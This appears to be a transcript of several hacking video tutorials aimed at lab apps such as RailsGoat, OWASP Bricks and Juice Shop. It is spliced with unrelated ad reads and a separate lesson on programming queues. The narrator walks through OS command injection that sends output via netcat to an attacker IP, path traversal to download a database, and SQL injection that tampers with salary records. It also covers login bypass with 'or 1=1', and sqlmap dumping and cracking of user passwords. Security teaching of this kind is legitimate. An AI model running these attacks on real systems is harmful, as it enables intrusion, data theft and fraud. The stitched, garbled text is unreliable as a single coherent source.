Man, what the business said, man. What going on, man? What going on, bro?
Today I'll be teaching you how you can be as good looking as Mr. Hacker Loy. I'm just kidding. I'll be teaching you how to be a hacker instead, which is much easier.
Jokes.
And now before we get started, kids, remember, hacking is illegal. If you get caught hacking, there's really nothing much I can do to help you. The police will come knocking on your door, get you arrested, and the next thing you know, you can never see Mr. Hacker Loy again. So here's a list of things they'll be doing today. So first of all, you have a website that you'll be targeting, and you'll be entering the website URL over here. And of course, in this case, it could be, say, loyliangyang.com as your target. Well, I mean, we're not here for online shopping, you know. Next up, what you'll be doing over here is to then begin targeting the server using a operating system like Kali Linux that is loaded with all this different type of hacking tools, scripts, and so on that we can target the site on. In this case, we'll be looking out for potential vulnerabilities on the site. So vulnerabilities could be, for example, SQL injection that we can target. It could be operating system command that we can target as part of different parts of the site features. And the craziest thing is that we can even change information that are displayed on the site. So you can do just that. And the reason we can do that is because behind every website, there is a large, gigantic database of all this different information that could be containing like username, like passwords, like salary information. Okay, that's very juicy. And lots of all this different data that we can target.
Today's supply chain leaders are pressured to drive business growth.
And now before we get started, kids, this is going to be a pretty long tutorial. And you need at least 15 cups of coffee. I already have 25 cups. And remember, kids, with great power comes great responsibility. And what you need to do right now is to turn on notifications, subscribe to the channel so that you don't get hacked. All right, so right in front of us, we're in Kali Linux. So this is going to be your best friend here. And of course, your best friend forever, your BFF is Hacker Loy. And of course, the next best friend is Kali Linux. So what I can do now is go ahead and open up a browser. So in this case, we have, say, Firefox. And what you can do now is typically you can target the site by entering under the URL. So in my case, I can enter the following of 192.168.0.184 followed by /willsgoat. So this is going to be the website that we will be targeting. And of course, in other cases, you can be going to say loyliangyang.com to target this site. But if you really target loyliangyang.com, I assure you, I will find out your IP address. I will find out everything about you, your location, your name, your password. Oh, don't worry. I'm just helping you find out your password. So right in front of us, we are on the login page. So we can go ahead and say, for example, log into the...
All right, bro. We're going to work on Q's today, bro.
the site, or at the same time registering an account on the site. So either way, we are trying to figure out the application structure. We have to really understand how data flow from the browser all the way to the backend system. So in this case, I have already created an account. So I can go ahead and log in right here, HackerLoy at hackerloy.com, as you can see right here. And of course, I can enter the password to log right in. And I click login, boom, done. So we are now logged in. And of course, this looks like a human resource HR system. And of course, we have the 401k, we have the available PTO, sick days taken, income, and so on and so forth. So, and you see on the left side, all these are the different parts or pages of the site that we can target. And of course, the very first thing you need to do as a professional hacker is to go over each of these pages so that you understand the application structure inside out and understand how the pages work, what are the URLs. So of course, you can see right here in this case, we have something pretty interesting already. So if you see right here, we have the following of the URL. And of course, in the URL, we have users, we have a number, and then we have, say, another page here called benefit forms. So this reviews a lot of things, because if I was to create another user, would 7 become another digit? The other thing that we're looking out for, as you can see here, is we have health insurance as well as dental insurance and the ability to upload a file. Now, looking over here, we can go ahead and say click under health insurance as well as dental insurance, and we can see over here, all right, we have a PDF document and so on. And we have the following information over here. Again, we are targeting the URL. So we have the download name equal .pdf and type equal file. So pretty interesting. So this one is a possible entry point or injection point for us. Likewise, under denter and stuff, .pdf and type equal file. So again, this is another possible entry point for us. The reason why I say this could be a potential entry point is because if I was to change this over into .. would I be able to reach another file of interest just by pointing it to a completely separate file name or path? And maybe you're thinking, Mr. Hackaloy, why aren't you doing a brute force attack against a login page? Now, on a website, you would have a login page typically. And of course, what the hackers will be doing is to target the login page using all sorts of email addresses that they possibly have already mined or harvested, as well as the password field using, say, all the different combinations or commonly used passwords like 1, 2, 3, 4, 5, 6, 7, 8, password as passwords. All these are the commonly used passwords, and it'll be injecting them directly into the login field. The downside to this is that it is easily detectable and prevented at the application or at the firewall level. Well, what we need to do then is to be more creative in our attack approach. And what we'll be doing now is to go to the top right corner and set up our interceptor. And in this case, we'll be using Burp Suite as our interceptor to look at all the different requests that are going to be sent over into the application server. So go ahead and click on that. Next up, the super cool stuff that you want to learn, which is to look like a hacker. So you open up Terminal right now and go ahead and enter Burp Suite, followed by N. And now we're opening up our interceptor. So here we have the Burp Suite Community Edition. Right, go ahead and click Start Burp. And what we can do now is go under the Proxy tab and ensure the intercept is on. So once we have that, I can go ahead and click Upload File, click Add File. So in this case, I can go ahead and I can upload a normal file. So perhaps in this case, I can go ahead and select under something called dark-dash or .hash.txt. And we have that right here. Go ahead and click Start Upload. And we're intercepting right now. Okay, so let's go ahead and go back to Burp Suite Community Edition. So this is a live reload. So I'll go ahead and drop this one. And right here, we have the post Rails code upload. So do a right click on this, send over to repeater. The reason why I'm sending over the repeater is because I want to understand about what is part of the HTTP request that is going to be sent over to the application server. So right here, we can see the following. All right, so we have the post. So this is the HTTP method. So we are going to be uploading things or posting things over into the target URL here, which is Rails code upload. All right, we have the user agent information as part of the browser, accept language, content type. So in this case, we have multi-part form data. All right, so we have the origin, referral, right, cookie information. Right, so we have the Rails Guild session. Right, so this is something that you're using as part of your session identity. Right, so your session value, whatnot. So that's part of the cookie. And as I scroll down further, we have the upgrade insecure request one. We have the content disposition, right? So in this case, we have the name of UTF-8, and then we have a tick here, possibly to indicate some form of, say, it is a legitimate request and whatnot. So that could be the case. And I have more content disposition, authenticity token. Okay, that's it.
All right, so look, we're gonna implement queues today, bro. So this is what we're gonna do. Bro. Because Q represents a waiting list, a line of items waiting to be served/processed. A queue can be viewed as a special type of list where the elements are added to the end of the queue and are removed and processed from the front of the queue. Queues are first in, first out. So now what we're gonna do, we're gonna add something in there that queues up user actions or system access requests after login and processes them one by one. It's going to model real-world security concepts like rate limiting, job queuing, intrusion detection logs, login session audit trails, DDoS mitigation tools. After a user logs in, they can submit secure actions, quote unquote, like accessing a file, requesting permissions, etc. These actions are added to a queue. The system processes the request first in, first out. The GUI shows a live queue monitor, and we can also simulate underflow/overflow. It's going to teach us security because it features first in, first out queue. And that's relevant to security because it's fair access control, anti-starvation, queue size limit, simulate system overload/denial of service, request timestamps, simulates audit trails and forensics, action processing, simulates firewall or IE, intrusion detection system queue. Okay, cool. All right, let's get it, bro.
Interesting. This could be a data that we'll be using later on. We have a false under benefits backup. Okay, that's interesting. So typically, if there is a false value sent over as a part of a parameter, then in that case, it's either true or false. So what happens if we change this up a little bit? All right, so that could be the case. And then we have something here called benefits upload. All right, so in this case, we have the file as well as the file information right at the bottom. So this is the hackalloysalary.docx, so on and so forth. So this was part of another tutorial that we did earlier. Now, to speed up your learning, as part of running all of this different type of checks, scans, looking out for vulnerable openings, the whole idea behind ethical hacking or hacking as a whole is to find entry points, injection points, whether they are structured query language injection, whether operating system command injection. The goal is to find a part of the site that is vulnerable. That's the whole idea of hacking. So in this case, what happens if I change this to true? So over here, you can see the following benefits backup. So what is it trying to do? It's trying to copy a file that is uploaded into a backup directory. Could that be the case? We don't know because this is a black box testing. So we have no idea about the application structure and we need to figure that out first. So in this case, if I change this to true, what would happen? All right, so you go ahead and click send, and you can see on the right, okay, you are being redirected. Okay, that's interesting. So you are being sent back over into the Rails Code user 7 benefit forms and so on and so forth. So that is to be expected. Okay, so if I was to change this back to the default value of false, I click send, same thing. All right, not much changes have been seen. So there could be some kind of possible instructions, either based on the application itself or on the operating system level, right? So those are things that can possibly be running as part of this application structure, and we want to exploit that. Moving on, we can also click onto other pages. So in this case, we have, say, 401k info. So you can see once again under the URL, Rails Code users 7 retirement. All right, so PTO, all right, work info, and so on and so forth. So possibly one of it may have a vulnerability, meaning that if we were to change this value over here, we may see something else. So say, for example, I change this to 6, I hit enter on that.
Podcast editing is so frustrating. That's why Riverside makes editing super simple and fast. Check it out. Your podcast transcript is here, and you just have to edit the text, and that will edit the podcast. Super simple. You'll never edit your podcast the old way again. No podcaster has the time to clean up an hour-long conversation. That's why God gave us AI.
And boom, we see someone else's data. All right, I enter 5. Oh, we see Ken Johnson's data. So again, there are different parts of the site that could be vulnerable. And in some parts of the site, they are not. And in other parts, they are vulnerable. So all these are the different type of things you can possibly hit to see whether you are getting a vulnerable entry point to go after. All right, so all these are the different possibilities that you can use as part of running your hack. Next up, we also have messages on the left. So when you click on the messages, you're able to send message to the different users within the application. So these are the users that are stored in the backend database system. Typically, if you are able to send messages, you may be thinking about doing something called the cross-site scripting attack. So this is a part where you can inject your own script, and when the user open up the message, it possibly redirects them to hackerloy.com. All right, so those are things that you can do as part of sending out the message. So you send some scripts along with the message. Finally, not to miss out on anything, if you go to the top right corner, you can click on our account settings. And in account settings, you're able to update your personal information too. So likewise, if you go under the Foxy proxy, and if I was to go ahead and enter the first name of, say, Hacker Loy, and then I have the password field over here. So maybe I enter a password field for a password confirmation, and I go ahead and click submit on this one. I click submit. I go to Burp Suite, or I go to Proxy tab, and of course I can go ahead and drop this one. I would drop the live reload, and of course in this case we have post users 7.json. Right, in this case, if you see at the bottom, we have the user and password confirmation, all these different details. So if I send over to repeater, so on the second repeater tab, you can see the different information here that is sent along to the backend system. All right, so behind every application server, there is a database. And we also want to figure out what kind of database are they using. Is it a Microsoft SQL? Is it a MySQL database? And PostgreSQL? Is it a SQLite? And all of that. So all these different possible databases that we are targeting as part of launching the hack. Now, as part of testing, we really want to understand what are the potential areas or entry points or injection points. So as part of testing, you have already ran through several checks against all these different parameters or input fields, and you have uncovered that file name is susceptible to operating system command injection. So in that case, what we can do here under file name is you can test them out. All right. So in this case, in this situation, I can say ls, all right, and then I can have a possible connectivity over into the hacker's machine. So in this case, we have 118 and then port 4444. So what this would do is to stream the ls, which is listing of the files and directories within the current working directory, over into our hacker's machine. So in this case, I can go ahead and set up the netcat. All right, so in this situation, I can enter the following IP-ADDR. So this is the hacker's IP address of 192.168.0.118. And what I can do now is go ahead and enter NC. All right, so we're setting up our listener. So the listener is set up right now. I can go back over to Burp Suite. And what I can see here is we have the ls, right, followed by netcat over into 192.168.0.118.4444. So in this case, if I was to go ahead and enter send, let's see what we get. I go back to the netcat listener, and we can see right here, we have the following information. And there you go, you have hacked into the machine. So this is the current working directory of the application server. So in this case, we have several interesting directories, right? So here you can see the following of possibly database, config, all right? So all these are the different targets that we're going after because we want to find out if they're storing the usernames or the password somewhere. So now with operating system command injection, this allows us to build out the application structure very cleanly. So what I can do now is go ahead and change this up a little bit. So I want to know what is the current working directory. So I'll be using PWD, which is print working directory, and again, sending information over into the hacker's machine. So what I can do now is go ahead and set up a listener, go back to Burp Suite, click send, and you can see right here, we have the following of OWASP, BWA, Rails, Goat-Git. And now what I've done here is I've copied the results from the operating system command injection over here. So we understand that the application is operating on OWASP, BWA, Rails-Git. And of course, we are targeting, say, the directory of DB, which could likely stand for database, which we are very interested in because it could possibly show us some of this information like usernames, password fields, and so on that would allow us to do other things. All right, so we go back over into Burp Suite, all right, and in this case, we want to target and see what is inside of the DB folder or directory. So you see right here, we've changed up the operating system command a little more. So we do a CD over into the following directory of DB, and then we do the following of LS. So what we're doing here now is to go into the working directory of database, and then after which we do a listing. All right, so let's go ahead and do that right now. So go ahead and set up your listener, go back to Burp Suite, click send, go back to the following. You can see the following of development.sqlite3. All right, we have the schema.rb, seeds.rb, and test.sqlite3. So what we want to do now is go ahead and figure a way to download that file. So in this situation, if I go back over to Rails code, download, name equal. So what I can do here is try to see whether we're able to target that directory holding the development.sqlite3 file, right? So what I can do now is do a //, right? So the reality is we don't know what is current working directory, but with 5 of this over here, which allow us to move back to the root directory, and then we can go ahead and target the following. So if I go back into here, we have the OWASP BWA Rails code -kit. So I go back over the URL, I paste it over here, I remove this one, and I have a /db/development.sqlite3. All right, so if I go back over the results over here, this is the file that we are targeting. So I go back over to the browser, I hit enter on this, and now we can save the file. All right, so let's go ahead and save it and go ahead and replace the file. So I've already done this setup and testing for you. Done. We managed to download the file because of a vulnerability, another entry point for us to download information from within the operating system. At this point, I'm very happy to declare that you're no longer a script kiddie. Now, what we're going to do is to interrogate it or to query the file. So what I can do now is go ahead and enter SQLite3 followed by development.sqlite3. Hit enter on that. And now,
have you ever heard content creators say, comment the word burgers below and I'll send you over something for free? And then when you comment,
we can query the database. So in this case, we can enter .tables and we can see the following. So all these are different tables that are within the application server. So in this case, we can see things like benefits, paid time off, retirements, users. Users is pretty interesting. Messages, pay, schedules, work infos. So all this are the different tables that we are targeting. So in this case, we want to say interact. So I can enter select star from users, hit enter, and boom. This is super cool. So we have the following of admin at metacop.com. All right. We have Jack, we have Jim, Mike, Ken, Loy, Liang Yang at gmail.com, Hacker Loy as well. So all these are the different users. And likely the second column seems to be some kind of hashed password. So we could possibly go back to rainbow tables where we have all this list of commonly used passwords that are thrown into the same hashing algorithm and do a reverse lookup on it and see what we get. Right, so we get all these beautiful details right here. Additionally, you can also enter prepmar, all right, followed by the table underscore info. And in this case, we can go for users, hit enter on that, and can see the following of the columns. All right, so we have the first column as ID, second as email, third as password, and admin. Okay, that's interesting. So whether the user is an admin or not an admin, so true or false, so pretty straightforward. And then we got a user ID. So user ID, you can see here, it is being added incrementally. So you have 1, 2, 3, 4, 5, 6, and 7. So all these are added incrementally. And finally, we have the auth token. All right, so this is, again, another interesting piece of information we can possibly use as, say, trying to hijack another user session. Now, before I go any further, you may be thinking, why do I go straight for a reverse shell, especially now I have the ability to run operating system commands? So before I jump further, what are exactly reverse shells? So right here, you have on the left, the target server, and of course on the right, you have Mr. Hackaloy. And what you can do now is you can possibly just automatically run an operating system command injection or operating system command and send that to connect over to Mr. Hackaloy's machine, and then we can remotely control the entire computer. However, the reason why we could not do that in this tutorial is because there is some kind of application sanitization of input or some kind of possible firewall that's operating, protecting the application system. So what's happening right here, as you can see, is right in the middle, we seem to have a firewall. And the firewall, or possibly sometimes it's also embedded within the application layer, is that it is filtering some of this common type of special characters like slash, like single quotes, all right, like double quotes, and semicolons possibly too. So all these are the different types of special characters that may be completely removed, all right, as part of protecting the application against all these different types of attacks. Now, going back to Linux, what we want to do is there a way for us to update our salary information? So that's pretty interesting. So I can do, say, select star from the following of work_info, hit enter on that, And we can see the following. So we have the user, all right, ID 7, and now we are currently on $60,000. So is there a way for us to change this to say $1 million? So the answer is yes. And we do need a combination of several things. So in order for this hack to work through. So the first thing we need to do is to upload a file containing certain instructions. And number 2 is to then execute on that file that will then provide information to the execution. All right, so that will be what we'll be doing here. So what I can do now is go ahead and enter the following. All right, so we have CD over to DB. And what I want to do now is, because remember, it is escaping, all right, the single quote, it is escaping the forward slashes and backward slashes. So we're very limited on what we can do. So what we have here is the final payload. So what we do now is we cd or change directory to database, and we do an echo. And in this case, we're doing an update work infos, set income to $100,000, where user ID is equal to 7. And we do a semicolon to end off the SQLite command, all right, which is, again, in this case, a structured query language command. So of course, in that case, all right, we have the single quote. All right, so this allows us to end off whatever we want to echo here, save it to a file within the DB directory, and then we put a hexer, which is to comment out the rest of the operating system command. So super clean, super neat, super smart. And once you're ready, go ahead and click send, and boom, done. The file is now created on the backend database. You can easily do a check on that. So what you can do if you want to check on this, you can again go over to cddb and do an ls-l and then followed by the following of netcat 192.168.0.118 and then say port 4444, right? So this again allow us the ability to send those information because of the operating system command injection that we discover as an entry point. So I can do nc, all right, nlvp 4444, hit enter on that, go back to Burp Suite, go ahead and click send on this and see what we get as a result. So if I go back over here, I can see right here we have file and it's been updated, all right, based on the most current time. Okay, if I do of course, you can do a cat on file as well and be able to get those information out of it. So what we want to do now is to go back to Burp Suite and to execute on the update. All right, so this is the final payload. So we have the change directory to database directory again, and we have the SQLite 3, development.SQLite 3, and then, of course, we run the following instructions from file, and within the file, which is to update the works info so the hacker Lloyd gets a better salary. And of course, we have the hex on the end to comment out the rest of the operating system command. Once you're ready, click send. Boom. Now you go back over to the browser, click under work info, and right here we have the income of $100,000. So thank you for giving me a better salary.
Summer savings start now with the best price of the season for Corsair Plus. Get $200 off.
And today I'll be teaching you structured query language injection, SQLI. So right in front of us, we have Open Web Application Security Project Bricks. So this is a vulnerable web application platform for us to load our SQL injection and payloads into the website so that we can gain access into different components of the database system. And the database systems houses all the sensitive data records like usernames, email addresses, passwords. Whether the passwords are protected using hashes or not, either way, we'll learn about how to break into those passwords too. And that is really scary because the first part is learning about how can we manually run our injection payloads into the site. And the second part is we can identify vulnerable parameters very, very quickly and be able to pull out lots of information easily from a highly automated SQL injection tool. And this is frightening because it speeds up the whole process of penetration testing into any website, any web application platform. So right in front of us, we have Open Web Application Security Project Bricks. And if you see right here, this is a website. And this could be an informational site, it could be a login site, it could be a site that provides e-commerce services, whichever the case is. So if we go to the top right corner, we have this particular section called Login Pages. So let's go ahead and click on it. So once you're in, this is a wonderful way for you to learn about penetration testing onto any web application sites. So right here, all I got to do is click under, say, the first part, which is basic login. So let's go ahead and click on it. And here it states the following. You are not logged in. And the first thing that you want to do whenever you reach into any site is to go through what I call a happy journey map, meaning that this is what is to be expected from the outcome of the logic that is being built into the web application system. So if I go ahead and enter, say, for example, a username called Loy Liang Yang, okay, and I enter some random password and I click submit. And of course, right here it says the following: wrong username or password. And you see one more particular notification at the bottom, one message here, which is the feedback. And this is useful for you to picture what is going on behind the website as the application server tries to connect to the database and pull out query from the database system. And the database houses all these records like usernames, passwords, email addresses, and so on and so forth. So it has a lot of personal and sensitive data. So right here, what we can see is that we have the following. I'm going to copy this. I'm going to go ahead and open up, say, a text editor, and I will call it, say, I will use mousepad, okay? And we can go ahead and open it up, and I can do a right click, and I can paste it right here, and we can see over here. And this is how the application servers talk to the database, literally. So here we have select star, which is all from users where name equal, all right, followed by a password. And this is the query that is being sent over from the application server into the database. And right here, what we can notice is that we are trying to find ways of bypassing the security mechanism. And say, we know what is the name. Perhaps that there is a username that we could find on LinkedIn as part of information gathering. We could find on Facebook about the employees of the company, all right, or even in the website itself, they could have a particular page that shows the employees who are working in the company as a directory and so on. So many different ways to do a reconnaissance, to do information gathering. So here, all you got to do is say enter someone you know. So it could be Tom, right? So in this case, and we have the password field. So what we can do, so in a SQL query, what we need to do is to ultimately get a true statement. So all I got to do now is to enter the following. Say we have no idea what's the password. We can enter or, okay.
Hey, if you're spending thousands of dollars and taking days or weeks to build and rank a site in
1 equal 1. Okay, and let us try and insert this into the login page and look at what happens. So here I can go back into the website. I can enter Tom. And what I'll do next is to go ahead and copy and paste the payload that we have just created right here. So I can go ahead and copy this and I'll paste it into the password field. So once I paste it, I'll click submit and let's see what happens. That's it. We have successfully logged into the site, successfully log in. And as you see at the bottom, select all from users with name equal Tom and password, okay, is as such, or 1 equal 1. And what does or 1 equal 1 means, right? So if you remember back in school, 1 equal 1 is true, and it always is true. Or 1 equal 1 means that it will always be true. So this statement is always true, and as such, as a result of that, the web application server will issue you, say, a cookie, a session cookie, whichever the case is, and you will gain access into the site. A lot of sites are pretty secure now, and they would have different layers of security. So one of those particular word lists that you want to look out for is actually the word list that could help us find out whether, okay, we have different kind of payloads that we can utilize as part of the SQL injection. And we have over here, we have general, injections, other, stress, vulnerabilities, web services. So let's go ahead and cd and change directory into injections, enter ls. And I can do, say, for example, head sql.txt. So these are all the different kind of payloads that you can inject into the site, literally. And this is how we can identify whether this particular input field is vulnerable to it. So I can enter cat sql.txt, hit enter on this, and we can see all these different SQL payloads that you can inject into the page. Say, for example, your single quote, your double quote didn't work. Then what can we do? What we can do now is to use other forms of payloads here that you can see to run the attack against that specific parameter and see whether we're able to ultimately get an error page, all right, or to get some kind of response from the server that is different from what is normal. And that's the whole idea behind SQL injection. And next up, what I want to introduce to you is a way for us to do a highly automated matter in terms of finding out whether the input fields are vulnerable. So what I can do now is go ahead and go to the top right corner. I can use Foxy Proxy and we'll click under Burp Suite. So this would enable the proxy to intercept our posts into the site. So all I got to do now is just go ahead and enter Burp Suite. So I can launch Burp Suite directly from here so that we can see what kind of post is being sent over into the site, okay? So here I can delete the following temporary file. I will not update now. Click Next. Use Burp defaults. And right here we have the Burp Suite Community Edition. and we click on the proxy tab and ensure the intercept is on. So here we can see that intercept is on, so that's great. So what we can do next is to go ahead and enter some normal value and go ahead and click submit, and that will get intercepted immediately by Burp Suite, as you can see right here. So what I can do now is to copy the entire post, all right, the entire post request, and copy it. And what I will do now is to save it into a file. All right, so I'll save it into a file, and I can go ahead and save this file. All right, so let's go ahead and say create a file, and let's name it as OWASP break SQL injection. Okay, so let's go ahead and do a touch OWASP breaks injection. Okay, hit enter on this, and what I can do next is use mouse pad, open up this particular file. All right, so open it up, and we can see right here, and I can paste it, and I can save it. So let's go ahead and save the information. So this is OWASP breaks injection. Okay, so what I can do next is to go ahead and use SQL map to help us target the parameter automatically to find out whether it is injectable, whether it is vulnerable to structured query language injection. So all I got to do now is enter SQL map, okay, followed by dash to specify the file that we have just created, which is the post request. So we have OWASP breaks injection, all right, and next what we can do is to specify the target parameter. So in this case, we can enter the following, all right, so we can enter dash followed by P, right? So this is the parameter that we're gunning for. So enter username. So hit enter on this, and you can see right here, all right, it looks like the backend DBMS is MySQL. Do you want to skip task payloads specific for other database management systems? So very, very quickly, we are able to identify vulnerable parameters. So as you can see here, username might be injectable. So that's one, MySQL database. And two, might be also vulnerable to cross-site scripting, which we will do up on a separate tutorial fully about cross-site scripting attacks. So do we want to skip? Yes. So they could save us a lot of time. And do you want to include, all right, all tasks for MySQL extending provider level? All right, so let's go ahead and enter yes for this. And right here, it is running all those injections into this particular parameter to see whether we're able to probe the database, whether we are able to bypass the web application checks, the sanitization. And very quickly, right here, we can see that the following time-based blind is injectable, meaning that we have found a way for us to bypass the security checks and gain full control of the database. Just like that, very, very quickly, we are able to identify the vulnerable parameter. And what we can do next is the following. Do you want to retry to find proper union column types with fuzzy tests? So enter a no for this. Okay, injection not exploitable with null values. Do you want to try with random integer value for option union character? Right, so enter yes on this. And again, they're highlighting recommended steps that you can take next in SQL Map. So this is a fantastic tool, highly automated to test your web application systems to look at vulnerabilities, whether they are injectable. And at the same time, if you're opening up a web application firewall and you're keen to see whether you're able to detect all these different kind of payloads coming in, again, this will be a wonderful way for you to add in those checks and sanitization, and at the same time, detection capabilities so that you can block anyone who is using these tools to hijack into your website. Next up, all right, you want to try with a random value. All right, enter yes on this. And it states the following, okay, post parameter username is vulnerable. Do you want to keep testing the others, if any? All right, so there's no need for that. So let's go ahead, and right here, we got the following details. SQL Map identified the following injection points with a total of 423 HTTP requests. So another way in terms of defense is to also look at the threshold that you have as the web request coming in from a particular IP address. So if an IP address was probing your website much more than what is considered as normal. So a normal user go to your website, they do a login, they search for some products, and then they check out, and that could be possibly, say, 20, 30 requests on average per minute. And someone's come in with over 400 requests over a minute. So there could be something malicious that the user is trying to do into your website. And you want to actually block that specific IP address or all those different kind of payloads from coming into your website, which could then ultimately give them further access into different parts of the site. So going back to the tutorial here, so we managed to identify that the backend database management system is MySQL. So very quickly, we found out that we have the parameter, all right, and Boolean-based blind and time-based blind. So this particular parameter is vulnerable to these two different payloads, all right, these two different type of attacks under SQL injection. So what we can do next is to go ahead and enter /dump, hit enter on this, and it will try to dump out all.
Did you know you can AFK Bloods and Zaya whilst learning to code in Python? Go to boot.dev.
the values, all the columns, all the rows, all the cells inside the database system. So right here, we can find out the following, all right? Before you even scroll down further, we can look right here. We have the columns for table users, and then we have the ID users, name, email, password, host, all right? And we scroll down further, we can get all the retrieved information. So we literally got the username, the email address right here, admin tom@getmantra.com. And we scroll down further, we have Harry, we have Ron. Okay, do you want to store hashes to a temporary file? So if you're doing any kind of password cracking, you can store this to a temporary file. For our case, we are not going to do that. So I enter no for this. And do you want to crack them via a dictionary-based attack? Why not? All right, so let's see what is the password being stored for certain users inside the database system. So enter yes for this. And this is our dictionary file. So there is a word list inside USR share SQL map. So hit enter on this. Do you want to use common password suffixes? So enter no. So again, right here, we are doing dictionary-based cracking immediately. And over here, we can see the whole list of all the users, all right, the email addresses. And over here, we have the following password field. We managed to crack it in seconds. So very quickly, we are able to see all the data that is housed behind the web application server inside the database. So you saw how quickly we're able to get all the sensitive data, personal information of the entire website using SQL injection. So we learned about manual SQL testing. We also learned about using automated tools like SQL Map to help us gain unauthorized access into the entire site. And it's very, very scary. So you got to protect your website against all these possible threats as quickly as you can, using layer 7, using layer 4, looking at a threshold of requests coming in, looking at all the different kind of payloads that's hitting into your web application firewall, detect those as quickly as you can and block those users from further access into your website. Else, they would be able to do all sorts of funny things on your site. So once again, I hope you have learned something valuable in today's tutorial. And like, share, and subscribe to the channel so that you can be kept abreast of the latest cybersecurity tutorial. Thank you so much once again for watching.
Good morning, good afternoon, good evening, ladies and gentlemen.
Today we will be learning penetration testing. Get your keyboard ready. It is going to be a wild ride. Now, before we continue, kids, penetration testing is hacking. And you need to ask your mom first for permissions before we start hacking. At the same time, only hack yourself. Only hack devices that you own. Hack websites that you own. Hack computers, hack laptops, hack mobile devices that you own or that you have consent to do those stuff. So yes, this is the tutorial that will let you look like a hacker, typing away behind a black computer screen with those green color tags, making you look like someone who really knows computers. And if that is what you're inspired to be, this is the video that you watch. There are 5 things that we'll be going through today. The first one is you need a laptop with an internet connection. Without internet connection, what are you going to hack? Number 2, we need a toolbox for hackers. So in this case, it could be Linux, which is going to be a penetration testing operating system. Or at the same time, it could be Parrot OS or even a Windows XP. Number 3, we are going to scan the target website, looking out for entry points that we can send our code into so that we are now able to hack into the site, gaining access into usernames, passwords, and all these different details. And finally, if all goes as planned, we can even have full control of the entire computer.
Are you ready?
And now, before we go any further, you want to smash the like button and subscribe to the channel so that you get notified whenever I hack you. So whenever there is a new hacking tutorial. And right in front of us, we have Kali Linux running. This is going to be our ethical hacking and penetration testing operating system that we'll be using throughout the whole of the tutorial, or possibly throughout your whole life. And you can see from the top left corner, with all these different hacking tools, scripts that you can easily use as part of the penetration testing cycle. So as you can see here, we have things like information gathering, to scan the device, scan the website, looking out for and understanding what type of systems, languages are the site using so that we can be more targeted, can be more specific when it comes to the hacking part. So you have to do your homework before you start hacking. We have vulnerability analysis. This is the part where we are discovering all these different vulnerabilities and openings. So just like a house, you are now a burglar. You're going over to a house and seeing where are all the entry points. Is the door locked? Do they have guardrails? Do they have high walls? What kind of security do they have? Do they have CCTV cameras? What kind of CCTV cameras are they using? All of this matters as part of understanding the system so that we can be more targeted when it comes to hacking. Next up, we have web application analysis, and this is the part where we're targeting a website. We want to understand, what is the website running on? What exactly are the different parts of the site that we can target? Database assessment, this is the part where the back-end system is housing all the system of records like usernames, passwords, and all of that, and we are targeting it from here. Password attacks has two types. Online attack, where we're doing things like a brute force login against the system, or number two, we have now extracted all of those passwords and we want to be able to break those protected passwords. Wireless attacks is where we could be targeting all those Wi-Fi within the area, trying to break into those Wi-Fis, or creating fake Wi-Fi access points so that others log into these fake Wi-Fi access points and we can direct them to some fake social media pages, harvesting their usernames, their passwords, their credentials. Reverse engineering is very exciting. This is the part where we are going to be able to look into an application, breaking down the application, seeing specifically where the calls are made, and looking for entry points once again so that we can bypass those controls within it. Exploitation tools, the most exciting part of all that you are waiting for. This is where we send malicious code over into the system, giving us full access into the entire server, into the entire mobile device, into the entire laptop, or any internet-connected devices, sniffing and spoofing. Do you even know whether the network you're connected to now is not looking at the traffic that you are going in and out of? This is where we're able to view all this different traffic information through the tools right here. Post-exploitation. Now that I have hacked you, what's next? Can I hack not just your laptop? How about your mobile device? How about your home router? How about your Facebook, your Gmail accounts, and all of that? Can I hack more of you? Forensics. This is where you go to when you know that you've been hacked by me. This is where you try to gather information, artifacts about what happened in that incident. Reporting tools. This is where you need to submit a security report to the company that you're doing a penetration testing on, and you put your data, put all of those information evidences right into a report that is easy to read. Social engineering tools. This is where you are being scammed. This is where you go into a site thinking that it is a real login page, but it is not. It is merely harvesting your credentials. Kali and offensive security links. This is the place where you go to, where you want to learn more, where you want to understand more, you want to dive deeper into other things. So right in front of us, we have OWASP, which is Open Web Application Security Project. And in this case, we have the Choose Shop. This is a vulnerable website that you can easily run on your computer so that you can just hack yourself instead of hacking other people's websites. The first thing you do is not go ahead and start smashing the hacking button, but instead, you want to walk through the site. Gain familiarity with the site. Know exactly what the site is doing. What is it trying to achieve? Where are the entry points? How do people log in? What is considered a normal path for a user? And with that, it allows you to think about all of those other different paths that you can possibly take to gain access into the system. For example, in this case, you see a search button right here, and I can enter any form of keywords. I enter, say, Apple, and I hit enter on that.
I need to find the best way to learn math and science.
It's brilliant.org.
Whoa.
Brilliant has thousands of interactive lessons.
And we can see some results right here. And of course, there are some slight changes to the website that we are now looking at, which is here, search $Q = Apple. So these are the entry points that we are targeting. So this is the place where we can send malicious code over to the site and think about what can happen when we send those code. And now if I go ahead and click onto any of the results, you can see in this case we have Apple Pomace. We have reviews, we have the price, we have the description, the product name, and so on and so forth. So the first thing that we're going to do right now is to open up the Web Developer Tools. So go over the top right corner, click onto More Tools, and click onto Web Developer Tools. So from here, we can see the network tab. So this will show us how are we interacting with the site. So for example, in this case, I click on the apple juice. You can see right here, there's a few calls that occurred. For example, who am I, reviews, all right? And you can see the initiator being polyfuse.js. Okay, so we can see if I click on the banana juice and all these different juices, you'll be able to see how your browser.
That's smooth, bro. That's smooth, bro. So you can use it for firewalls, authentication servers, intrusion detection systems, queue incoming requests before being overwhelmed. Just like in our app, they process requests one by one, helping prevent denial of service attacks or resource exhaustion. Queues are essential for rate-limiting user actions such as login intents, API calls, or file download. By enforcing the maximum queue size, systems can reject or delay suspicious activity. Security event logs, alerts, and background monitoring tasks are often queued for asynchronous processing. This makes the system more scalable and responsive without risking data loss. Just like a bouncer controls the line at a club, queues in cybersecurity control who gets in how fast and how safely. It's a bet, y'all boys. Y'all boys take it easy. I gotta get up out of here, bro.